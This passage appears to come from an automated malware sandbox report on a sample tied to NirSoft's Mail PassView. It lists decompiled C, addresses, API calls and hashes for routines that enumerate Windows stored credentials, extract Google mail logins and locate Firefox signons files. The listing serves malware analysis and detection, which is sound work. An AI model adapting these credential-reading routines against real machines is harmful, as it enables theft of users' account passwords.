					_t23[2] = GetProcAddress(_t12, "CredReadA");
					_t23[3] = GetProcAddress( *_t23, "CredFree");
					_t23[4] = GetProcAddress( *_t23, "CredDeleteA");
					_t23[5] = GetProcAddress( *_t23, "CredEnumerateA");
					_t23[6] = GetProcAddress( *_t23, "CredEnumerateW");
					if(_t23[2] == 0 || _t23[3] == 0) {
						E004046C2(_t23);
					} else {
						_t23[1] = 1;
					}
				}
				return _t23[1];
			}






                                                                                              0x00404648
                                                                                              0x0040464a
                                                                                              0x00404654
                                                                                              0x0040465c
                                                                                              0x0040465e
                                                                                              0x00404676
                                                                                              0x00404682
                                                                                              0x0040468e
                                                                                              0x0040469a
                                                                                              0x004046a3
                                                                                              0x004046a7
                                                                                              0x004046b8
                                                                                              0x004046af
                                                                                              0x004046af
                                                                                              0x004046af
                                                                                              0x004046a7
                                                                                              0x004046c1

                                                                                              APIs
                                                                                                • Part of subcall function 004046C2: FreeLibrary.KERNEL32(?,0040464F,?,0040D601,80000001,7554F420), ref: 004046C9
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,7554F420), ref: 00404654
                                                                                              • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                              • GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                              • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                              • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                              • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                                              • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                              • API String ID: 2449869053-4258758744
                                                                                              • Opcode ID: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                                                              • Instruction ID: 1c6fa8d05b29e269fad2443f962c2e8eb3052cc88d23d174a3c6f0c0958544ff
                                                                                              • Opcode Fuzzy Hash: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                                                              • Instruction Fuzzy Hash: 380121705447009AC730AF75CD08B46BAF4EF85704F218D2EE281A3690E7BE9491DF88
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00411015, Relevance: 19.7, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 76%
                                                                                              			E00411015(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, char* _a12, signed int* _a16) {
				void _v8;
				void _v12;
				void _v24;
				char _v39;
				void _v40;
				char _v132;
				void _v1156;
				void _v1172;
				char _v1180;
				void _v1187;
				char _v1188;
				void _v2228;
				void _v2243;
				void _v2244;
				void _v3267;
				char _v3268;
				void _v4291;
				char _v4292;
				char _v5340;
				void _v5347;
				char _v5348;
				char _v6116;
				char _v7136;
				void _v7140;
				void* __edi;
				void* __esi;
				int _t86;
				void* _t109;
				void* _t122;
				void* _t135;
				char _t156;
				signed char _t168;
				signed int _t171;
				intOrPtr _t177;
				signed int _t183;
				void* _t185;

				_t171 = __edx;
				E004118A0(0x1be4, __ecx);
				_t156 = 0;
				_v3268 = 0;
				memset( &_v3267, 0, 0x3ff);
				_a8 = E00410E8A(_a8,  &_v3268);
				_t86 = strlen(_a4);
				_v8 = _t86;
				if(_a8 > 4) {
					_t193 = _t86;
					if(_t86 > 0) {
						asm("movsd");
						asm("movsd");
						asm("movsb");
						_v2244 = 0;
						memset( &_v2243, 0, 0x41e);
						_v1188 = 0;
						memset( &_v1187, 0, 0x41e);
						_v5348 = 0;
						memset( &_v5347, 0, 0x41e);
						_v40 = 0;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosw");
						asm("stosb");
						_v4292 = 0;
						memset( &_v4291, 0, 0x3ff);
						E0040BC49( &_v132);
						E0040BC6D(_v8,  &_v132, _a4);
						_t181 =  &_v132;
						E0040BD0B( &_v39,  &_v132,  &_v2244);
						memcpy( &_v2228,  &_v24, 8);
						E0040BC49( &_v132);
						_push( &_v2244);
						_t109 = 0x18;
						E0040BC6D(_t109,  &_v132);
						E0040BD0B( &_v39, _t181,  &_v1188);
						memcpy( &_v1172,  &_v2244, 0x10);
						memcpy( &_v1156,  &_v24, 8);
						E0040BC49(_t181);
						_push( &_v1188);
						_t122 = 0x28;
						E0040BC6D(_t122, _t181);
						E0040BD0B( &_v39, _t181,  &_v5348);
						E0040535A( &_v6116, _t193,  &_v1180,  &_v5348);
						E004053D6( &_v5340,  &_v1188,  &_v4292,  &_v6116);
						_t177 = _a8;
						asm("cdq");
						_t183 = _t177 + (_t171 & 0x00000007) >> 3;
						_a4 = 0;
						if(_t183 > 0) {
							do {
								E004053D6(_t185 + (_a4 << 3) - 0xcc0,  &_v6116, _t185 + (_a4 << 3) - 0x10b8,  &_v6116);
								_a4 =  &(_a4[1]);
							} while (_a4 < _t183);
							_t177 = _a8;
						}
						_t135 = 0;
						if(_t177 > _t156) {
							do {
								_t168 =  *(_t185 + _t135 - 0x10c0) ^  *(_t185 + _t135 - 0xcc0);
								_t135 = _t135 + 1;
								 *(_t185 + _t135 - 0x1be1) = _t168;
							} while (_t135 < _t177);
						}
						 *((char*)(_t185 + _t177 - 0x1be0)) = _t156;
						strcpy(_a12,  &_v7136);
						E0040BC49( &_v132);
						_t67 = _t177 - 4; // 0x0
						E0040BC6D(_t67,  &_v132, _a12);
						E0040BD0B(_t177,  &_v132,  &_v40);
						memcpy( &_v8,  &_v40, 4);
						memcpy( &_v12,  &_v7140, 4);
						_t156 = 1;
						 *_a16 = 0 | _v8 == _v12;
					}
				}
				return _t156;
			}







































                                                                                              0x00411015
                                                                                              0x0041101d
                                                                                              0x00411025
                                                                                              0x00411034
                                                                                              0x0041103a
                                                                                              0x00411053
                                                                                              0x00411056
                                                                                              0x00411060
                                                                                              0x00411063
                                                                                              0x00411069
                                                                                              0x0041106b
                                                                                              0x00411079
                                                                                              0x0041107a
                                                                                              0x0041107b
                                                                                              0x0041108a
                                                                                              0x00411090
                                                                                              0x0041109e
                                                                                              0x004110a4
                                                                                              0x004110b2
                                                                                              0x004110b8
                                                                                              0x004110bf
                                                                                              0x004110c5
                                                                                              0x004110c6
                                                                                              0x004110c7
                                                                                              0x004110c8
                                                                                              0x004110cf
                                                                                              0x004110d8
                                                                                              0x004110de
                                                                                              0x004110e6
                                                                                              0x004110f4
                                                                                              0x00411100
                                                                                              0x00411103
                                                                                              0x00411115
                                                                                              0x0041111f
                                                                                              0x0041112a
                                                                                              0x0041112d
                                                                                              0x00411130
                                                                                              0x0041113c
                                                                                              0x00411151
                                                                                              0x00411163
                                                                                              0x0041116a
                                                                                              0x00411175
                                                                                              0x00411178
                                                                                              0x0041117b
                                                                                              0x00411187
                                                                                              0x004111a6
                                                                                              0x004111be
                                                                                              0x004111c3
                                                                                              0x004111c8
                                                                                              0x004111d0
                                                                                              0x004111d8
                                                                                              0x004111db
                                                                                              0x004111dd
                                                                                              0x004111f8
                                                                                              0x004111fd
                                                                                              0x00411203
                                                                                              0x00411206
                                                                                              0x00411206
                                                                                              0x00411209
                                                                                              0x0041120d
                                                                                              0x0041120f
                                                                                              0x00411216
                                                                                              0x0041121d
                                                                                              0x00411220
                                                                                              0x00411220
                                                                                              0x0041120f
                                                                                              0x00411233
                                                                                              0x0041123a
                                                                                              0x00411242
                                                                                              0x0041124a
                                                                                              0x00411250
                                                                                              0x0041125c
                                                                                              0x0041126b
                                                                                              0x0041127d
                                                                                              0x00411295
                                                                                              0x00411296
                                                                                              0x00411296
                                                                                              0x0041106b
                                                                                              0x0041129e

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0041103A
                                                                                                • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                                                              • strlen.MSVCRT ref: 00411056
                                                                                              • memset.MSVCRT ref: 00411090
                                                                                              • memset.MSVCRT ref: 004110A4
                                                                                              • memset.MSVCRT ref: 004110B8
                                                                                              • memset.MSVCRT ref: 004110DE
                                                                                                • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                                                                • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                                                              • memcpy.MSVCRT ref: 00411115
                                                                                                • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                                                                • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                                                              • memcpy.MSVCRT ref: 00411151
                                                                                              • memcpy.MSVCRT ref: 00411163
                                                                                              • strcpy.MSVCRT(?,?), ref: 0041123A
                                                                                              • memcpy.MSVCRT ref: 0041126B
                                                                                              • memcpy.MSVCRT ref: 0041127D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memcpymemset$strlen$strcpy
                                                                                              • String ID: salu
                                                                                              • API String ID: 2660478486-4177317985
                                                                                              • Opcode ID: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                                                              • Instruction ID: 480a48fc981763c339c301d1addb7ab339a070bf665ce532ed27993edd9122c1
                                                                                              • Opcode Fuzzy Hash: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                                                              • Instruction Fuzzy Hash: A4717F7190011DAADB10EBA9CC819DEB7BDFF08348F1445BAF609E7151DB749B888F94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403E87, Relevance: 19.6, APIs: 7, Strings: 6, Instructions: 98stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 81%
                                                                                              			E00403E87(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				char _v76;
				void _v1099;
				char _v1100;
				void _v2123;
				char _v2124;
				void _v3147;
				char _v3148;
				char _v4172;
				void* __ebx;
				void* __esi;
				void* _t36;
				void* _t37;
				void* _t48;
				void* _t55;
				intOrPtr* _t56;
				signed int _t58;
				intOrPtr* _t63;
				void* _t70;
				void* _t71;

				_t56 = __ecx;
				E004118A0(0x1048, __ecx);
				_t63 = _t56;
				_v8 = _t63;
				E00405EFD(_a4, "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v1100 = 0;
				memset( &_v1099, 0, 0x3ff);
				_v3148 = 0;
				memset( &_v3147, 0, 0x3ff);
				_v2124 = 0;
				memset( &_v2123, 0, 0x3ff);
				_t71 = _t70 + 0x2c;
				if( *0x417308 != 0) {
					sprintf( &_v3148, "<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>", 0x417308);
					_t71 = _t71 + 0xc;
				}
				if( *0x417304 != 0) {
					strcpy( &_v1100, "<table dir=\"rtl\"><tr><td>\r\n");
				}
				_t36 =  *((intOrPtr*)( *_t63 + 0x1c))();
				_t58 = 0x10;
				_push(_t36);
				_t37 = memcpy( &_v76, "<html><head>%s<title>%s</title></head>\r\n<body>\r\n%s <h3>%s</h3>\r\n", _t58 << 2);
				asm("movsb");
				sprintf( &_v4172,  &_v76,  &_v3148, _t37,  &_v1100);
				E00405EFD(_a4,  &_v4172);
				_push("Mail PassView");
				_t55 = 6;
				_push(E004078FF(_t55));
				sprintf( &_v2124, "<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_t48 = E00405EFD(_a4,  &_v2124);
				_t78 = _a8 - 4;
				if(_a8 == 4) {
					return E004097E6(_v8, _t78, _a4);
				}
				return _t48;
			}























                                                                                              0x00403e87
                                                                                              0x00403e8f
                                                                                              0x00403e9f
                                                                                              0x00403ea1
                                                                                              0x00403ea4
                                                                                              0x00403eb9
                                                                                              0x00403ebf
                                                                                              0x00403ecd
                                                                                              0x00403ed3
                                                                                              0x00403ee1
                                                                                              0x00403ee7
                                                                                              0x00403eec
                                                                                              0x00403ef5
                                                                                              0x00403f08
                                                                                              0x00403f0d
                                                                                              0x00403f0d
                                                                                              0x00403f16
                                                                                              0x00403f24
                                                                                              0x00403f2a
                                                                                              0x00403f2f
                                                                                              0x00403f34
                                                                                              0x00403f35
                                                                                              0x00403f3e
                                                                                              0x00403f5a
                                                                                              0x00403f5b
                                                                                              0x00403f6a
                                                                                              0x00403f72
                                                                                              0x00403f79
                                                                                              0x00403f7f
                                                                                              0x00403f8c
                                                                                              0x00403f9b
                                                                                              0x00403fa3
                                                                                              0x00403fa7
                                                                                              0x00000000
                                                                                              0x00403faf
                                                                                              0x00403fb8

                                                                                              APIs
                                                                                                • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                              • memset.MSVCRT ref: 00403EBF
                                                                                              • memset.MSVCRT ref: 00403ED3
                                                                                              • memset.MSVCRT ref: 00403EE7
                                                                                              • sprintf.MSVCRT ref: 00403F08
                                                                                              • strcpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F24
                                                                                              • sprintf.MSVCRT ref: 00403F5B
                                                                                              • sprintf.MSVCRT ref: 00403F8C
                                                                                              Strings
                                                                                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F02
                                                                                              • <table dir="rtl"><tr><td>, xrefs: 00403F1E
                                                                                              • Mail PassView, xrefs: 00403F72
                                                                                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F86
                                                                                              • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F36
                                                                                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E97
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memsetsprintf$FileWritestrcpystrlen
                                                                                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$Mail PassView
                                                                                              • API String ID: 1043021993-495024357
                                                                                              • Opcode ID: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                                                              • Instruction ID: b86957a5e19b08f75c710fe46d40d6f019605627493d012667a382a844d4f915
                                                                                              • Opcode Fuzzy Hash: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                                                              • Instruction Fuzzy Hash: A93196B2C40118BADB11EB55DC82EDE7BACEF44304F0045A7B60DA3151DE786FC88BA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404288, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00404288(intOrPtr __ecx, void* __esi, void* __fp0, wchar_t** _a4) {
				intOrPtr _v8;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				wchar_t* _t23;
				char* _t41;
				wchar_t** _t59;
				void* _t76;

				_t76 = __fp0;
				_t59 = _a4;
				_t23 =  *_t59;
				_v8 = __ecx;
				if(_t23 != 0 && _t59[1] != 0 && _t59[2] != 0 && wcsstr(_t23, L"www.google.com") != 0) {
					E004021D8( &_v940);
					_v800 = 7;
					_v412 = 3;
					WideCharToMultiByte(0, 0, _t59[1], 0xffffffff,  &_v408, 0x7f, 0, 0);
					WideCharToMultiByte(0, 0, _t59[2], 0xffffffff,  &_v280, 0x7f, 0, 0);
					strcpy( &_v928,  &_v408);
					strcpy( &_v796,  &_v408);
					if(strchr( &_v796, 0x40) == 0 && strlen( &_v408) + 0xa < 0x7f) {
						sprintf( &_v796, "%s@gmail.com",  &_v408);
					}
					_t41 = strchr( &_v928, 0x40);
					if(_t41 != 0) {
						 *_t41 = 0;
					}
					E00402407( &_v940, _t76, _v8 + 0xfffff788);
				}
				return 1;
			}















                                                                                              0x00404288
                                                                                              0x00404293
                                                                                              0x00404296
                                                                                              0x0040429c
                                                                                              0x0040429f
                                                                                              0x004042d3
                                                                                              0x004042ee
                                                                                              0x004042fa
                                                                                              0x00404304
                                                                                              0x00404318
                                                                                              0x00404328
                                                                                              0x0040433b
                                                                                              0x00404354
                                                                                              0x0040437e
                                                                                              0x00404383
                                                                                              0x0040438f
                                                                                              0x00404398
                                                                                              0x0040439a
                                                                                              0x0040439a
                                                                                              0x004043ab
                                                                                              0x004043ab
                                                                                              0x004043b6

                                                                                              APIs
                                                                                              • wcsstr.MSVCRT ref: 004042BD
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404304
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404318
                                                                                              • strcpy.MSVCRT(?,?), ref: 00404328
                                                                                              • strcpy.MSVCRT(?,?,?,?), ref: 0040433B
                                                                                              • strchr.MSVCRT ref: 00404349
                                                                                              • strlen.MSVCRT ref: 0040435D
                                                                                              • sprintf.MSVCRT ref: 0040437E
                                                                                              • strchr.MSVCRT ref: 0040438F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWidestrchrstrcpy$sprintfstrlenwcsstr
                                                                                              • String ID: %s@gmail.com$www.google.com
                                                                                              • API String ID: 1359934567-4070641962
                                                                                              • Opcode ID: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                                                              • Instruction ID: 90bd0330eeb49ee3a27dc93359d6b9986b282e86ae315167fefd13048bcd18fc
                                                                                              • Opcode Fuzzy Hash: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                                                              • Instruction Fuzzy Hash: 793188B290021D7FDB21D791DD81FDAB3ACDB44354F1005A7F709E2181D678AF858A58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040827A, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 96%
                                                                                              			E0040827A(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, char* _a8) {
				void _v4103;
				char _v4104;
				int _t21;
				int _t28;
				void* _t35;

				_t35 = __eflags;
				E004118A0(0x1004, __ecx);
				strcpy(0x4171b8, _a8);
				strcpy(0x4172c0, "general");
				E00407E55(_t35, "TranslatorName", 0x412466);
				E00407E55(_t35, "TranslatorURL", 0x412466);
				EnumResourceNamesA(_a4, 4, E004080A3, 0);
				EnumResourceNamesA(_a4, 5, E004080A3, 0);
				strcpy(0x4172c0, "strings");
				_t28 = 0;
				_v4104 = 0;
				memset( &_v4103, 0, 0x1000);
				do {
					_t21 = LoadStringA(_a4, _t28,  &_v4104, 0x1000);
					if(_t21 > 0) {
						_t21 = E00407EC3(_t28,  &_v4104);
					}
					_t28 = _t28 + 1;
				} while (_t28 <= 0xffff);
				 *0x4171b8 = 0;
				return _t21;
			}








                                                                                              0x0040827a
                                                                                              0x00408282
                                                                                              0x00408292
                                                                                              0x004082a2
                                                                                              0x004082b2
                                                                                              0x004082bd
                                                                                              0x004082d8
                                                                                              0x004082e2
                                                                                              0x004082ea
                                                                                              0x004082f5
                                                                                              0x004082ff
                                                                                              0x00408306
                                                                                              0x0040830e
                                                                                              0x0040831a
                                                                                              0x00408322
                                                                                              0x0040832c
                                                                                              0x00408332
                                                                                              0x00408333
                                                                                              0x00408334
                                                                                              0x0040833e
                                                                                              0x00408347

                                                                                              APIs
                                                                                              • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 00408292
                                                                                              • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082A2
                                                                                                • Part of subcall function 00407E55: memset.MSVCRT ref: 00407E7A
                                                                                                • Part of subcall function 00407E55: GetPrivateProfileStringA.KERNEL32(004172C0,00000104,00412466,?,00001000,004171B8), ref: 00407E9E
                                                                                                • Part of subcall function 00407E55: WritePrivateProfileStringA.KERNEL32(004172C0,?,?,004171B8), ref: 00407EB5
                                                                                              • EnumResourceNamesA.KERNEL32 ref: 004082D8
                                                                                              • EnumResourceNamesA.KERNEL32 ref: 004082E2
                                                                                              • strcpy.MSVCRT(004172C0,strings,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082EA
                                                                                              • memset.MSVCRT ref: 00408306
                                                                                              • LoadStringA.USER32 ref: 0040831A
                                                                                                • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Stringstrcpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                              • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                              • API String ID: 1060401815-3647959541
                                                                                              • Opcode ID: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                                                              • Instruction ID: d5eae57ffc3fdd8f11c9b4c351fac369e1a37aafa95eb04bb89d09d1e585c4c7
                                                                                              • Opcode Fuzzy Hash: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                                                              • Instruction Fuzzy Hash: 6E1104319802543AD7212B56DC06FCB3E6DCF85B59F1040BBB708B6191C9BC9EC087AD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D1EC, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 128stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 83%
                                                                                              			E0040D1EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void _v267;
				char _v268;
				void* __edi;
				void* __esi;
				void* _t31;
				int _t40;
				void* _t44;
				void* _t49;
				char* _t50;
				void* _t57;
				int _t62;
				char* _t68;
				void* _t70;
				void* _t73;
				void* _t74;
				intOrPtr* _t86;
				char* _t89;
				void* _t90;
				char** _t91;

				_t86 = __eax;
				_t31 = E00406C2F(__eax + 0x1c, __eax, __eflags, _a4);
				_t94 = _t31;
				if(_t31 == 0) {
					__eflags = 0;
					return 0;
				}
				E0040462E(_t86 + 0x468);
				_t68 = _t86 + 0x158;
				E004061FF(_t68, _a4);
				_t89 = _t86 + 0x25d;
				 *_t89 = 0;
				E0040C530(_t94, _t86 + 0x18);
				if( *_t89 == 0) {
					_t62 = strlen(_t68);
					 *_t91 = "signons.txt";
					_t9 = strlen(??) + 1; // 0x1
					if(_t62 + _t9 >= 0x104) {
						 *_t89 = 0;
					} else {
						E004062AD(_t89, _t86 + 0x158, "signons.txt");
					}
				}
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t40 = strlen(_t86 + 0x158);
				_t91[3] = "signons.sqlite";
				_t15 = strlen(??) + 1; // 0x1
				_pop(_t73);
				if(_t40 + _t15 >= 0x104) {
					_v268 = 0;
				} else {
					E004062AD( &_v268, _t86 + 0x158, "signons.sqlite");
					_pop(_t73);
				}
				_t98 =  *_t89;
				if( *_t89 != 0) {
					_t57 = E00406C2F(_t86 + 4, _t86, _t98, _t89);
					_t99 = _t57;
					if(_t57 != 0) {
						E0040C475(_t73, _t86, _t99);
					}
				}
				_t44 = E0040614B( &_v268);
				_t100 = _t44;
				_pop(_t74);
				if(_t44 != 0) {
					E0040CE28(_t74, _t100, _t86,  &_v268);
				}
				_t70 = 0;
				if( *((intOrPtr*)(_t86 + 0x474)) <= 0) {
					L19:
					return 1;
				} else {
					do {
						_t90 = E0040D438(_t70, _t86 + 0x468);
						_t24 = _t90 + 0x504; // 0x504
						_t49 = _t24;
						_push("none");
						_push(_t49);
						L004115B2();
						if(_t49 != 0) {
							_t25 = _t90 + 4; // 0x4
							_t50 = _t25;
							if( *_t50 == 0) {
								_t26 = _t90 + 0x204; // 0x204
								strcpy(_t50, _t26);
							}
							 *((intOrPtr*)( *_t86 + 4))(_t90);
						}
						_t70 = _t70 + 1;
					} while (_t70 <  *((intOrPtr*)(_t86 + 0x474)));
					goto L19;
				}
			}






















                                                                                              0x0040d1fb
                                                                                              0x0040d200
                                                                                              0x0040d205
                                                                                              0x0040d207
                                                                                              0x0040d371
                                                                                              0x00000000
                                                                                              0x0040d371
                                                                                              0x0040d213
                                                                                              0x0040d21b
                                                                                              0x0040d223
                                                                                              0x0040d22c
                                                                                              0x0040d233
                                                                                              0x0040d236
                                                                                              0x0040d23e
                                                                                              0x0040d241
                                                                                              0x0040d248
                                                                                              0x0040d254
                                                                                              0x0040d25e
                                                                                              0x0040d277
                                                                                              0x0040d260
                                                                                              0x0040d26e
                                                                                              0x0040d274
                                                                                              0x0040d25e
                                                                                              0x0040d288
                                                                                              0x0040d28f
                                                                                              0x0040d29e
                                                                                              0x0040d2a5
                                                                                              0x0040d2b1
                                                                                              0x0040d2ba
                                                                                              0x0040d2bb
                                                                                              0x0040d2d8
                                                                                              0x0040d2bd
                                                                                              0x0040d2cf
                                                                                              0x0040d2d5
                                                                                              0x0040d2d5
                                                                                              0x0040d2df
                                                                                              0x0040d2e2
                                                                                              0x0040d2e8
                                                                                              0x0040d2ed
                                                                                              0x0040d2ef
                                                                                              0x0040d2f1
                                                                                              0x0040d2f1
                                                                                              0x0040d2ef
                                                                                              0x0040d2fd
                                                                                              0x0040d302
                                                                                              0x0040d304
                                                                                              0x0040d305
                                                                                              0x0040d30f
                                                                                              0x0040d30f
                                                                                              0x0040d314
                                                                                              0x0040d31c
                                                                                              0x0040d36c
                                                                                              0x00000000
                                                                                              0x0040d31e
                                                                                              0x0040d31e
                                                                                              0x0040d32b
                                                                                              0x0040d32d
                                                                                              0x0040d32d
                                                                                              0x0040d333
                                                                                              0x0040d338
                                                                                              0x0040d339
                                                                                              0x0040d342
                                                                                              0x0040d344
                                                                                              0x0040d344
                                                                                              0x0040d34a
                                                                                              0x0040d34c
                                                                                              0x0040d354
                                                                                              0x0040d35a
                                                                                              0x0040d360
                                                                                              0x0040d360
                                                                                              0x0040d363
                                                                                              0x0040d364
                                                                                              0x00000000
                                                                                              0x0040d31e

                                                                                              APIs
                                                                                                • Part of subcall function 00406C2F: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D205,?,?,?,?), ref: 00406C48
                                                                                                • Part of subcall function 00406C2F: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406C74
                                                                                                • Part of subcall function 0040462E: free.MSVCRT(00000000,0040BC35), ref: 00404635
                                                                                                • Part of subcall function 004061FF: strcpy.MSVCRT(?,?,0040D228,?,?,?,?,?), ref: 00406204
                                                                                                • Part of subcall function 004061FF: strrchr.MSVCRT ref: 0040620C
                                                                                                • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C551
                                                                                                • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C565
                                                                                                • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C579
                                                                                                • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C646
                                                                                                • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C6A6
                                                                                              • strlen.MSVCRT ref: 0040D241
                                                                                              • strlen.MSVCRT ref: 0040D24F
                                                                                                • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                                • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                              • memset.MSVCRT ref: 0040D28F
                                                                                              • strlen.MSVCRT ref: 0040D29E
                                                                                              • strlen.MSVCRT ref: 0040D2AC
